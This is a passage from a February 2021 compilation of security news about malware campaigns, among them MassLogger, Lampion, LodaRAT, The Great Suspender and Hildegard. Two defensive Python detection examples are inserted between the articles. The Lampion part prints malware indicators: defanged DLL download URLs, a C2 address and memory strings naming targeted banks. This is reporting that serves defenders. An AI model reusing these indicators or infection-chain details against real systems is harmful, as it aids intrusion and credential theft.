These attachments contain a single compiled HTML file that, when opened, displays the message "Customer service," but in fact comes embedded with obfuscated JavaScript code to create an HTML page, which in turn contains a PowerShell downloader to connect to a legitimate server and fetch the loader ultimately responsible for launching the MassLogger payload.

Aside from exfiltrating the amassed data via SMTP, FTP or HTTP, the latest version of MassLogger (version 3.0.7563.31381) features functionality to pilfer credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.

"Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality," the researchers noted, adding the threat actor installed a version of Masslogger control panel on the exfiltration server.

With the campaign executed almost entirely in memory, the compiled HTML help file being the sole on-disk artifact, the significance of conducting regular memory scans cannot be overstated.

"Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format," the researchers concluded.


Masslogger Swipes Microsoft Outlook, Google Chrome Credentials

18.2.2021 Virus  Threatpost

A new version of the Masslogger trojan has been targeting Windows users – now using a compiled HTML (CHM) file format to start the infection chain.

Cybercriminals are targeting Windows users with a new variant of the Masslogger trojan, which is spyware designed to swipe victims’ credentials from Microsoft Outlook, Google Chrome and various instant-messenger accounts.

Researchers uncovered the campaign targeting users in Italy, Latvia and Turkey starting in mid-January. When the Masslogger variant launched its infection chain, it disguised its malicious RAR files as Compiled HTML (CHM) files. This is a new move for Masslogger, and helps the malware sidestep potential defensive programs, which would otherwise block the email attachment based on its RAR file extension, said researchers on Wednesday.

“The use of compiled HTML (usually used for Windows help files) can be advantageous for the attacker since the initial infection vector is email,” Vanja Svajcer, outreach researcher with Cisco Talos, told Threatpost. “Many organizations will not consider CHM files to be executables so it is more likely they will evade content filters filtering incoming email messages based on the attachment name or type.”

Masslogger is a spyware program, which is written in .NET and steals browser, email and instant-messaging credentials. The trojan was released in April and has since been sold on underground forums.

“Masslogger is a commodity malware that has been in development and circulation for almost a year now,” Svajcer told Threatpost. “It is sold on underground forums for a relatively modest amount of money and it can be used by any malicious actor. We wanted to emphasize that these campaigns with these particular spreading techniques can likely be linked to a single actor, based on the exfiltration server domain used in all campaigns for exfiltrating credentials.”

An example of a spear-phishing email targeting victims in Turkey. Credit: Cisco Talos

Researchers said the recent attack kicked off with email messages that contained “legitimate-looking” subject lines related to business. One email, for example, was entitled “Domestic customer inquiry” and told the recipient, “At the request of our customer, please send your attached best quotes.”

These emails contained RAR attachments – however, of note, while the typical filename extension for RAR files is .rar, the attackers in this case hid them behind the .chm file extension. The files were named with the pattern “r00,” with the numbers growing per file in each email.

The Compiled HTML (CHM) file format is used for help documentation — the files are compiled and saved in a compressed HTML format. They may include text, images and hyperlinks. CHM files are used by Windows programs as an online help solution.

This attachment filename extension is sometimes chosen to bypass “simple blockers,” which attempt to block RAR attachments using their default filename extension “.rar,” said Svajcer. WinRAR and other RAR-capable unarchivers will still open such files without problems, he noted.
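Both write-ups make the same point: a filter that keys on the ".rar" extension misses a RAR volume renamed to ".R09" or ".chm", and the CHM file inside it is what starts the chain. The following added example (not Cisco Talos's code) shows a content-based check that identifies RAR and CHM attachments from their leading bytes regardless of filename; the magic values are the published format signatures, and the sample attachments are constructed.

```python
"""Content-based attachment checking (added example; not Cisco Talos's code).

A RAR multi-volume archive keeps its signature in every volume, so sniffing
the first bytes catches ".R09"/".chm"-renamed volumes that a ".rar"-only
blocker would pass.  A genuine CHM file is flagged for review because the
campaign used one to carry the JavaScript/PowerShell download chain.
"""
from __future__ import annotations

from dataclasses import dataclass

# Published format signatures (first bytes of the file), not values from the article.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"      # RAR 1.5-4.x; each volume of a set starts with it
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"  # RAR 5.x
CHM_MAGIC = b"ITSF"                   # Microsoft Compiled HTML Help container


@dataclass
class Verdict:
    filename: str
    declared_ext: str        # extension taken from the filename
    detected: str            # format found by sniffing the content
    evades_ext_filter: bool  # True when a ".rar"-only blocker would have missed it
    action: str              # "block", "review" or "allow"
    reason: str


def sniff_type(data: bytes) -> str:
    """Return "rar4", "rar5", "chm" or "unknown" from the leading bytes."""
    if data.startswith(RAR4_MAGIC):
        return "rar4"
    if data.startswith(RAR5_MAGIC):
        return "rar5"
    if data.startswith(CHM_MAGIC):
        return "chm"
    return "unknown"


def declared_extension(filename: str) -> str:
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def assess_attachment(filename: str, data: bytes) -> Verdict:
    """Decide what to do with one attachment based on content, not on its name."""
    ext = declared_extension(filename)
    detected = sniff_type(data)
    if detected in ("rar4", "rar5"):
        evades = ext != "rar"
        reason = (f"RAR archive presented as .{ext or '(none)'}; a .rar-only filter would miss it"
                  if evades else "RAR archive with its default extension")
        return Verdict(filename, ext, detected, evades, "block", reason)
    if detected == "chm":
        # The campaign's chain: CHM -> embedded JavaScript -> PowerShell downloader.
        return Verdict(filename, ext, detected, False, "review",
                       "compiled HTML help file can carry script that starts a download chain")
    return Verdict(filename, ext, detected, False, "allow", "no archive or help-file signature")


def triage(attachments: list[tuple[str, bytes]]) -> list[Verdict]:
    return [assess_attachment(name, data) for name, data in attachments]


# Constructed samples: only the leading bytes matter for this check.
SAMPLES = [
    ("70727_YK90054_Teknik_Cizimler.R09", RAR4_MAGIC + b"\x00" * 32),  # name as quoted in the article
    ("quote.chm", RAR5_MAGIC + b"\x00" * 32),                          # RAR volume hidden behind .chm
    ("archive.rar", RAR4_MAGIC + b"\x00" * 32),                        # plainly named RAR
    ("Customer_service.chm", CHM_MAGIC + b"\x03\x00\x00\x00" + b"\x00" * 28),  # genuine CHM header
    ("notes.txt", b"plain text, nothing to see"),
]

if __name__ == "__main__":
    for v in triage(SAMPLES):
        print(f"{v.action:6} {v.filename:36} {v.detected:7} evades_filter={v.evades_ext_filter}  {v.reason}")
```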

The Masslogger infection chain. Credit: Cisco Talos

In this case, the attached files contain an embedded HTML file with “light-obfuscated” JavaScript code, which, once opened, starts the active infection process.

After the active infection process starts, a PowerShell script executes, which eventually de-obfuscates into a downloader. This then downloads and loads the main PowerShell loader.

“The main payload is a variant of the Masslogger trojan designed to retrieve and exfiltrate user credentials from a variety of sources, targeting home and business users,” said Svajcer. “Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality.”

Microsoft Outlook, Google Chrome Credentials Under Attack
The Masslogger payload contains the functionality to target and steal credentials from the following applications: Pidgin (a free and open-source multi-platform instant messenger client), the FileZilla File Transfer Protocol (FTP) client, the Discord group-chatting platform, NordVPN, Outlook, FoxMail, Firefox, Thunderbird, QQ Browser and Chromium-based browsers (Chrome, Chromium, Edge, Opera and Brave).

“Once the credentials from targeted applications are retrieved, they are uploaded to the exfiltration server with a filename containing the username, two-letter country ID, unique machine ID and the timestamp for when the file was created,” said Svajcer.

Masslogger Malware Continues to Evolve
Locations targeted by Masslogger. Credit: Cisco Talos

Researchers believe that the actor behind the campaign is tied to other attacks, which date back to at least September. These campaigns have targeted several European countries and shift their focus monthly. For instance, researchers detected email messages targeting Bulgaria, Estonia, Hungary, Italy, Latvia, Lithuania, Romania, Spain and Turkey, as well as messages written in English.

Based on the indicators of compromise (IoCs) that researchers retrieved, they said that they have “moderate confidence” that this attacker has previously used other payloads such as the AgentTesla trojan and the Formbook dropper in campaigns starting as early as April.

“The actor employs a multi-modular approach that starts with the initial phishing email and carries through to the final payload,” said Svajcer. “The adversaries behind this campaign likely do this to evade detection. But it can also be a weakness, as there are plenty of opportunities for defenders to break the kill chain.”


Researchers Unmask Hackers Behind APOMacroSploit Malware Builder
18.2.2021
Virus  Thehackernews

Cybersecurity researchers have disclosed a new kind of Office malware distributed as part of a malicious email campaign that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely.

The tool — dubbed "APOMacroSploit" — is a macro exploit generator that allows the user to create an Excel document capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.

APOMacroSploit is believed to be the work of two French-based threat actors "Apocaliptique" and "Nitrix," who are estimated to have made at least $5000 in less than two months selling the product on HackForums.net.
About 40 hackers in total are said to be behind the operation, utilizing 100 different email senders in a slew of attacks targeting users in more than 30 different countries. The attacks were spotted for the first time at the end of November 2020, according to cybersecurity firm Check Point.

"The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script," the firm said in a Tuesday report.

This system command script is retrieved from cutt.ly, which directs to servers hosting multiple BAT scripts that have the nickname of the customers attached to the filenames. The scripts are also responsible for executing the malware ("fola.exe") on Windows systems, but not before adding the malware location in the exclusion path of Windows Defender and disabling Windows cleanup.

In one of the attacks, the malware — a Delphi Crypter followed by a second-stage remote access Trojan called BitRAT — was found hosted on a Bulgarian website catering to medical equipment and supplies, implying that the attackers breached the website to store the malicious executable.

The use of "crypters" or "packers" has become increasingly popular among threat actors, not only to compress malware samples but also to make them more evasive and harder to reverse engineer.

BitRAT, which was formally documented last August, comes with features to mine cryptocurrencies, hack webcams, log keystrokes, download and upload arbitrary files, and remotely control the system via a command-and-control server, which in this case resolved to a sub-domain of a legitimate Bulgarian website for video surveillance systems.

Further investigation by Check Point involved chasing the digital trail left by the two operators — including two League of Legends player profiles — ultimately leading the researchers to unmask the real identity of Nitrix, who revealed his actual name on Twitter when he posted a picture of a ticket he bought for a concert in December 2014.

While Nitrix is a software developer from Noisy-Le-Grand with four years of experience as a software developer, Apocaliptique's use of alternative names such as "apo93" or "apocaliptique93" has stirred up possibilities that the individual may also be a French resident, as "93" is the colloquial name for the French department of Seine-Saint-Denis.

Check Point Research said it has alerted law enforcement authorities about the identities of the attackers.


Latin American Javali trojan weaponizing Avira antivirus legitimate injector to implant malware
17.2.2021
Virus  Securityaffairs

In the last few years, banking trojans developed by Latin American criminals have grown in both volume and sophistication. Although technologies intended to protect the end user have been widely adopted, such as plugins, tokens, e-tokens, two-factor authentication mechanisms, and chip-and-PIN cards, online fraud is still on the rise, and every day criminals implement new tactics, techniques, and procedures (TTPs) to evade antivirus and Endpoint Detection & Response systems.

In this article, we will go into the details of the Javali banking trojan, introduced and tracked by the Kaspersky team, which targets banking and financial organizations in Latin American countries, including Brazil and Mexico.

Background of Latin American Trojans
The Javali trojan has been active since November 2017 and targets users of financial and banking organizations located in Brazil and Mexico. By analyzing this piece of malware, we found that Javali uses the same routines and calls often observed in other Latin American trojans, such as Grandoreiro, URSA aka Mispadu, Lampion, Vadokrist, Amavaldo, Casbaneiro aka Metamorpho and Mekotio.

Figure 1: The most popular and dangerous Latin American trojans.

In short, some of these trojan families use padding to enlarge the binary: empty sections or even BMP images attached as a resource, as described in this article on the Grandoreiro trojan. Other trojans use the same technique because it allows them to execute the malicious code on the target machines while bypassing detection based on static file signatures.

Latin American trojans share the same modus operandi and even modules and blocks of code observed during the analysis of several malware samples. The following schema is an effort to present in a single high-level diagram the workflow of the most popular Latin American trojans.

Figure 2: High-level diagram of the modus operandi of the most popular Latin American banking trojans.

The malicious activity starts with a phishing email sent to the target victims in Latin America (Brazil, Mexico, Chile, and Peru) and Europe (Spain and Portugal). The initial stage of these trojans is generally the execution of a dropper in the form of a VBS, JScript, or MSI file that downloads the trojan loader/injector from the cloud (AWS, Google, etc.). After this step, the trojan itself, developed in Delphi, is executed in memory, mainly using DLL side-loading or DLL injection, and creates persistence using a .lnk file in the Windows Startup folder or by adding a new key in the machine registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) with the name and path of the .lnk file, guaranteeing that the malware is executed every time the infected machine starts.

In steps 7 and 8 of Figure 2, the malware obtains some details from the infected machine and reports them to the C2 server, including the version of the operating system (OS), the architecture, the names of the installed antivirus and EDR products, the computer name, and the victim’s geolocation.

From here, the malware starts a new thread when specific, hardcoded web browsers are opened. The titles of the accessed web pages are collected and compared with the target organizations and services hardcoded by the crooks, generally the names of banking portals, cryptocurrency portals, and financial firms. If these conditions match, the window overlay process starts, launching fake windows to lure victims.

More details and comparisons between several threats and the TTPs they use can be found below and in the publication from ESET.

Figure 3: MITRE ATT&CK table illustrating the features that Latin American banking trojans share (full table and more details here).

As observed during the last few years, several threats share a lot of TTPs and code, which is a clear signal of cooperation between malicious groups.

Discovering Javali trojan banker
These days, the Javali trojan banker is one of the most popular trojan banker families in the wild. According to the Kaspersky publication:

Javali targets Portuguese- and Spanish-speaking countries, active since November 2017 and primarily focusing on the customers of financial institutions located in Brazil and Mexico


Lampion trojan disseminated in Portugal using COVID-19 template
13.2.2021 
Virus  Securityaffairs

The latest release of the Latin American Lampion trojan has been updated with a new C2 address and is being disseminated in Portugal using a COVID-19 template.
In the last few days, a new release of the Latin American Lampion trojan was distributed in Portugal using a template related to COVID-19. This trojan has been distributed in Portugal in different ways, but this time the pandemic situation and the ongoing vaccination process are the lure this campaign uses to drop the beast in the wild.

In detail, the threat impersonates the domain “min-saude.pt”, and the link to the ZIP file is distributed in the email body.

Comuinicado-Covid19-Min-Saude-VRC-03–02-21-210.zip

The modus operandi is the same as observed in previous releases; only the addresses of the DLLs used during the side-loading process and the C2 server, geolocated in Russia, have changed.

DLLs used during the DLL side-loading process downloaded from Google storage
encrypted_string="n\s^[j]jef9ig0`%Y%|ipjweWh+WM]2[W$}]MeRee]8bc[{W<f6_$iH$iYLe]c|%=cUoOi6j@e;h/W*]M[o(g&c(_'P%=FZ#R(I#1'8/'$dZtb^bOg"
decrypted_string="hxxps://storage.googleapis.]com/mystorage2021/P-2-19.dll"

encrypted_string="iP/^*j6jvfpiV0O%A%*i;j+eLh(W\]K[N$0];e.ep]&br[gW+f/_)ik$+Y&excs%=cJo2i2jIe,h4W2]I[D(|&V(R'S%;&L$bpo_>fq5"
decrypted_string="hxxps://storage.googleapis.]com/mystorage2021/0.zip"

When the malware is executed, it communicates with the C2 server, and the browser overlay process begins every time a target home-banking portal is accessed on the victim’s side.

Strings extracted from memory (offset, length, value):
0x4e7e210 (22): <|AppClip|>
0x4e7e344 (38): Server Mandou====>
0x4e7e37c (36): <|FECHAR_RECORTE|>
0x4e7e3b0 (72): Server manda====> Fecahando Recorte!
0x4e7e408 (30): <|ALINHA_TELA|>
0x4e7e434 (34): ServRecebeu====>
0x4e7e474 (8): ><|>
0x4e7e4b4 (40): ClienteRecebeu====>
0x4e7e500 (44): Erro Encontrado====>
0x4e71f98 (28): banco montepio
0x4e71fc4 (16): montepio
0x4e71ff8 (26): millenniumbcp
0x4e72034 (18): Santander
0x4e72054 (14): BPI Net
0x4e72070 (18): Banco BPI
0x4e720a4 (24): Caixadirecta
0x4e720cc (42): Caixadirecta Empresas
0x4e72118 (20): NOVO BANCO
0x4e72150 (14): EuroBic
0x4e72186 (16): Credito Agricola
0x4e721b0 (20): Login Page
0x4e721d4 (22): CA Empresas
0x4e7220c (18): Bankinter
0x4e72240 (38): navegador exclusivo
0x4e74abc (14): TravaBB
0x4e74ada (32): Banco do Brasil
0x4e74b08 (16): Traazure
0x4e74b2a (32): Caixa Economica
0x4e74b58 (20): Travsantos
0x4e74b7e (20): Santander
0x4e74ba0 (14): Travsic
0x4e74bbe (14): Sicred
0x4e74bdc (14): Travite
0x4e74bfa (8): Ita
0x4e74c14 (18): Travdesco
0x4e74c36 (18): Bradesco
0x4e74c58 (22): BANRITRAVAR
0x4e74c7e (18): Banrisul
0x4e74ca0 (20): TravaBitco
0x4e74cc6 (32): Mercado Bitcoin
0x4e74cf4 (14): Travcit
0x4e74d12 (18): Citibank
0x4e74d34 (18): Travorigs
0x4e74d56 (30): Banco Original
0x4e74d84 (18): SICTRAVAR
0x4e74da6 (14): Sicoob
Communication process
0x64d637c (246): <|Info|><|>Microsoft Windows 10 Home (64)bit<|><|><|><<|@-@|DESKTOP-xxxxxxxxx - xxxx|Microsoft Windows 10 Home (64)bit|||MP|N
0x64d6474 (108): O|210X|..|FF|############00000000|5.188.9.28|||@-@

C2 server geolocated in Russia
C2: 5.188.9.]28

Banking overlay windows

Indicators of Compromise are available in the original report.


Various Malware Lurks in Discord App to Target Gamers
11.2.2021 
Virus  Threatpost

Research from Zscaler ThreatLabZ shows attackers using spam emails and legitimate-looking links to gaming software to serve up Epsilon ransomware, the XMRrig cryptominer and various data and token stealers.

A rise in online gaming, tied to pandemic-mandated social distancing, has led to a spike in criminals targeting the demographic. The latest effort to exploit the trend is malicious files planted inside the Discord platform designed to trick users into downloading malware-laced files.

Researchers report multiple active campaigns abusing the Discord “cdn[.]discordapp[.]com” service to trigger an infection chain and serve up the Epsilon ransomware, data-stealing Trojans and the XMRig cryptominer, according to a report by Zscaler ThreatLabZ. Attackers are also using the service for command-and-control (C2) communication, researchers observed.

Discord is a group-chatting platform originally built for gamers that has evolved into a virtual watering hole for socializing. The app is used by gamers and non-gamers alike to create communities on the web, called “servers,” either as standalone forums or as part of another website. Discord supports voice, video and text, allowing everyone to interact within the communities they create.

COVID-19 Safe, But Malware Laced Environment
Discord–like myriad other chat and online communication platforms–has seen an uptick in use. This has put a bullseye on Discord and other virtualized communities by hackers who see them as ripe targets for abuse.

“During 2020, research showed a sharp increase in game downloads, and this activity did not go unnoticed by cybercriminals,” according to the ThreatLabZ. “Attackers have often exploited the popularity of certain games (Among Us was a recent example) to lure players into downloading fake versions that served malware.”

While planting malware in Discord is not a new activity, researchers discovered a number of novel campaigns using various known malware to lure gamers from within the platform.

Malware Cornucopia
Malware found being planted recently in Discord includes not only Epsilon ransomware, but also the XMRig miner and three types of stealers—Redline Stealer, TroubleGrabber and a broad category of unidentified Discord token grabbers, according to ThreatLabZ.

The new Discord attacks observed by researchers usually start with spam emails in which users are tricked with legitimate-looking templates into downloading next-stage payloads. The attack vector uses Discord services to form a URL to host a malicious payload as https://cdn[.]discordapp[.]com/attachments/ChannelID/AttachmentID/filename[.]exe

The campaigns rename malicious files as pirated software or gaming software as well as use file icons related to gaming to trick victims, according to the report.

Researchers investigated the attack vectors of the different types of malware detected in the latest Discord campaigns, which each have their own methods.

Key Findings
Multiple campaigns relying on the cdn[.]discordapp[.]com service for their infection chain.
Cybercriminals are using Discord CDN to host malicious files as well as for command-and-control communication.
Malicious files are renamed as pirated software or gaming software to trick gamers.
File icons are also related to gaming software to trick gamers.
Multiple categories of malware are being served through the Discord app’s CDN infrastructure – ransomware, stealers, and cryptominers.
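The URL shape quoted above (cdn.discordapp.com/attachments/ChannelID/AttachmentID/filename) is something a proxy log can be checked for directly. The following added example (not Zscaler's code) parses that shape, flags executables fetched from the Discord CDN, and flags clients that keep requesting attachments, which the report associates with C2 use of the service; the log format, the executable-extension list, the threshold and all IDs in the sample lines are assumptions.

```python
"""Proxy-log triage for Discord CDN attachment downloads (added example; not
Zscaler ThreatLabZ's code).  Recognises
https://cdn.discordapp.com/attachments/<ChannelID>/<AttachmentID>/<filename>,
flags executable filenames, and flags clients that fetch attachments repeatedly.
Log format, thresholds and the extension list are assumptions; IDs are made up.
"""
from __future__ import annotations

import re
from collections import Counter
from typing import Optional

ATTACHMENT_URL = re.compile(
    r"https?://cdn\.discordapp\.com/attachments/"
    r"(?P<channel>\d+)/(?P<attachment>\d+)/(?P<filename>[^\s?#]+)",
    re.IGNORECASE,
)
# Extensions treated as executable content for this check (assumption).
EXECUTABLE_EXTS = {"exe", "scr", "dll", "msi", "bat", "cmd", "ps1", "vbs", "js", "hta"}
# Assumed: this many attachment fetches by one client in the scanned window is suspicious.
BEACON_THRESHOLD = 4


def parse_attachment_url(url: str) -> Optional[dict]:
    """Return channel, attachment id, filename, extension and an executable flag, or None."""
    m = ATTACHMENT_URL.search(url)
    if m is None:
        return None
    info = m.groupdict()
    name = info["filename"]
    info["extension"] = name.rsplit(".", 1)[1].lower() if "." in name else ""
    info["executable"] = info["extension"] in EXECUTABLE_EXTS
    return info


def parse_log_line(line: str) -> Optional[tuple[str, str]]:
    """Constructed log format: '<timestamp> <client-ip> <url>'; returns (client, url)."""
    parts = line.split()
    if len(parts) != 3:
        return None
    return parts[1], parts[2]


def triage(lines: list[str]) -> list[dict]:
    """Produce one alert per executable download and one per chatty client."""
    alerts: list[dict] = []
    fetches: Counter[str] = Counter()
    for line in lines:
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        client, url = parsed
        info = parse_attachment_url(url)
        if info is None:
            continue
        fetches[client] += 1
        if info["executable"]:
            alerts.append({"client": client, "kind": "executable-from-discord-cdn",
                           "filename": info["filename"], "channel": info["channel"]})
    for client, count in fetches.items():
        if count >= BEACON_THRESHOLD:
            alerts.append({"client": client, "kind": "repeated-discord-cdn-attachment-requests",
                           "count": count})
    return alerts


# Constructed log lines; the numeric IDs are placeholders, not real channels or attachments.
SAMPLE_LOG = [
    "2021-02-10T09:00:01Z 10.0.0.7 https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/Among_Us_Hack.exe",
    "2021-02-10T09:00:05Z 10.0.0.7 https://www.example.com/index.html",
    "2021-02-10T09:01:00Z 10.0.0.9 https://cdn.discordapp.com/attachments/111111111111111111/333333333333333333/ransom_note.png",
    "2021-02-10T09:01:30Z 10.0.0.9 https://cdn.discordapp.com/attachments/111111111111111111/333333333333333334/t1.txt",
    "2021-02-10T09:02:00Z 10.0.0.9 https://cdn.discordapp.com/attachments/111111111111111111/333333333333333335/t2.txt",
    "2021-02-10T09:02:30Z 10.0.0.9 https://cdn.discordapp.com/attachments/111111111111111111/333333333333333336/t3.txt",
    "2021-02-10T09:03:00Z 10.0.0.12 https://cdn.discordapp.com/attachments/444444444444444444/555555555555555555/notes.pdf",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```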
Different Malware Strokes, For Different Folks
In the case of the Epsilon ransomware, execution starts with dropping an .inf file and an .exe file in the Windows/Temp folder of the user’s machine. The malware establishes persistence by creating a registry key on the victim’s machine and then enumerates the system drives to encrypt files using double encryption–including a randomly generated 32-bit key and custom RC4 encryption that has a 2048-bit variable-length key.

Once encryption is established, the attack downloads the ransom note image from the cdn.discordapp.com link to show on the victim’s machine, researchers noted. However, unlike the stealers and cryptominer observed in the new campaigns, Epsilon does not use Discord to initiate C2 communication.

The Redline stealer–a new-ish Russian malware that’s been available on underground forums since last year—starts its attack by dropping a copy of itself into the AppData/Roaming folder of a victim’s machine. The stealer makes use of several popular gaming app names to perform its activities, which include collecting login and passwords, cookies, autocomplete fields and credit cards, as well as stealing data from FTP and IM clients, researchers said.

The XMRig miner initiates its attack by dropping a copy of itself at %ProgramData%\RealtekHDUpdater\realtekdrv[.]exe and then changes the system’s file permissions without user consent, as well as connecting to the C2 server with various commands.

What Threat Actors are After
After trying to delete a slew of programs on the victim’s machine—including Process Hacker, Task Manager, Windows, Windows Task Manager, AnVir Task Manager, Taskmgr[.]exe and NVIDIA GeForce—the miner launches using the Monero address “4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQswVtyKcWBsLoeY6A2.”

The other grabbers observed by researchers use Discord tokens to steal user information, a type of malicious activity that researchers at Sonatype also observed targeting Discord last month using the CursedGrabber malware.

Discord tokens are used inside bot code to send commands back and forth to the Discord API, which in turn controls bot actions. If a Discord token is stolen, it would allow an attacker to hack the server.

Researchers observed the TroubleGrabber performing token stealing in the latest campaigns as well as other various unidentified grabbers engaging in similar activity, they said.


LodaRAT Windows Malware Now Also Targets Android Devices
11.2.2021 
Virus  Thehackernews

A previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives.

"The developers of LodaRAT have added Android as a targeted platform," Cisco Talos researchers said in a Tuesday analysis. "A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities."

Kasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted.

The reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor.

First documented in May 2017 by Proofpoint, Loda is an AutoIt malware typically delivered via phishing lures that's equipped to run a wide range of commands designed to record audio, video, and capture other sensitive information, with recent variants aimed at stealing passwords and cookies from browsers.

The latest versions — dubbed Loda4Android and Loda4Windows — are a lot alike in that they come with a full set of data-gathering features that constitute a stalker application. However, the Android malware is also different, as it particularly avoids techniques often used by banking Trojans, like abusing Accessibility APIs to record on-screen activities.

Besides sharing the same command-and-control (C2) infrastructure for both Android and Windows, the attacks, which originated in October 2020, have targeted banks and carrier-grade voice-over-IP software vendors, with clues pointing to the malware author being based in Morocco.

The attackers also made use of a myriad of social-engineering tricks, ranging from typosquatted domains to malicious RTF documents embedded in emails that, when opened, triggered an infection chain leveraging a memory corruption vulnerability in Microsoft Office (CVE-2017-11882) to download the final payload.

While the Android version of the malware can take photos and screenshots, read SMS and call logs, send SMS and place calls to specific numbers, and intercept SMS messages or phone calls, its latest Windows counterpart comes with new commands that enable remote access to the target machine via Remote Desktop Protocol (RDP) and a "Sound" command that uses the BASS audio library to capture audio from a connected microphone.

"The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving," said researchers with Cisco Talos.

"Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss."


Watch out! ‘The Great Suspender’ Chrome extension contains Malware
7.2.2021 
Virus  Thehackernews

Google removed the popular The Great Suspender from the official Chrome Web Store for containing malware and deactivated it from the users’ PC.
Google on Thursday removed The Great Suspender extension from the Chrome Web Store. Millions of users had installed the popular Chrome extension; the IT giant also took the proactive measure of deactivating it on users’ computers.

The extension had more than two million installs before it was removed from the Chrome store. It was used to suspend tabs that aren’t in use, with the intent of saving resources, replacing each suspended page with a blank page until the user decides to use it again.

“This extension contains malware,” read the notification published by Google.
Experts discovered that a new maintainer of the extension had secretly added a feature that could be exploited to remotely execute arbitrary code.

The malicious code could be exploited to carry out malicious activities, such as committing advertising fraud.

“The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more. In v7.1.8 of the extension (published to the web store but NOT to GitHub), arbitrary code was executed from a remote server, which appeared to be used to commit a variety of tracking and fraud actions. After Microsoft removed it from Edge for malware, v7.1.9 was created without this code: that has been the code running since November, and it does not appear to load the compromised script. The malicious maintainer remains in control, however, and can introduce an update at any time. Well, they could until Google nuked the extension from their store.” reads a post published by Calum McConnell on GitHub. “The Great Suspender has been removed from the Chrome Web Store.”
Microsoft had blocked The Great Suspender extension since November because of the malicious code.

The extension’s original creator Dean Oemcke sold the extension in June 2020 to an unidentified party, since then the new maintainer uploaded two new versions on the Chrome store, 7.1.8 and 7.1.9.

If you have lost tabs due to the extension being removed read the following post:
“The extension comes with its own tab history management UI to help users recover from lost tabs. Go to the extension options page (from ‘settings’ in the popup or ‘options’ when right-clicking on the extension). Then in the settings sidebar click on ‘Session management’. This will show you your most recent tab sessions. You can click on each session to see more detail on the individual windows and tabs it contains. To reload a session, simply click the ‘reload’ link. This will reload all windows and tabs in an ‘unsuspended’ state. If your session contains a very large number of tabs, then you might instead want to click ‘resuspend’ which will be much faster as it reloads the tabs in a suspended state.”


WARNING — Hugely Popular 'The Great Suspender' Chrome Extension Contains Malware
7.2.2021 
Virus  Thehackernews

Google on Thursday removed The Great Suspender, a popular Chrome extension used by millions of users, from its Chrome Web Store for containing malware. It also took the unusual step of deactivating it from users' computers.

"This extension contains malware," read a terse notification from Google, but it has since emerged that the add-on stealthily added features that could be exploited to execute arbitrary code from a remote server, including tracking users online and committing advertising fraud.

"The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more," Calum McConnell said in a GitHub post.

The extension, which had more than two million installs before it was disabled, would suspend tabs that aren't in use, replacing them with a blank gray screen until they were reloaded upon returning to the tabs in question.

Signs of the extension's shady behavior had been doing the rounds since November, leading Microsoft to block the extension (v7.1.8) on Edge browsers that month.

According to The Register, Dean Oemcke, the extension's original developer, is said to have sold the extension in June 2020 to an unknown entity, following which two new versions were released directly to users via the Chrome Web Store (7.1.8 and 7.1.9).

Users of the extension can recover their tabs using a workaround, or, as an alternative, can install the latest version available on GitHub (v7.1.6) by enabling Chrome Developer mode.

But turning on the Developer mode can have other consequences, too, as revealed by security researcher Bojan Zdrnja, who disclosed a novel method that lets threat actors abuse the Chrome sync feature to bypass firewalls and establish connections to attacker-controlled servers for data exfiltration.

Zdrnja said the adversary created a malicious security add-on that masqueraded as Forcepoint Endpoint Chrome Extension for Windows, which was then installed directly on the browser after enabling Developer mode.

"While there are some limitations on size of data and amount of requests, this is actually perfect for C&C commands (which are generally small), or for stealing small, but sensitive data – such as authentication tokens," Zdrnja said.

But given that this attack requires physical access to a target system, it is unlikely to be resolved by Google.


New 'Hildegard' Malware Targets Kubernetes Systems
5.2.2021 
Virus  Securityweek

The hacking group referred to as TeamTNT has been employing a new piece of malware in a recently started campaign targeting Kubernetes environments, security researchers with Palo Alto Networks’ Unit 42 reveal.

During the summer of 2020, TeamTNT was targeting Docker and Kubernetes systems with a crypto-mining worm capable of stealing local credentials, including Amazon Web Services (AWS) login details.

In a different campaign that was detailed in September 2020, the threat actor was employing a legitimate open source tool named Weave Scope to fingerprint targeted cloud environments and execute commands.

In a brand new campaign that started in January 2021, but which appears to be only in its early stages, the hacking group has targeted Kubernetes environments with a piece of malware called Hildegard, which is both stealthy and persistent.

The malware establishes a connection with its command and control (C&C) server via a tmate reverse shell and an Internet Relay Chat (IRC) channel, disguises its malicious process under the name of the legitimate Linux bioset process, hides malicious processes using library injection, and encrypts the malicious payload to hinder analysis.

As part of the observed attacks, once the Kubernetes cluster was compromised, the hackers attempted to spread to additional containers, with the final purpose of the attacks being cryptojacking. However, no new activity has been identified since the initial detection.

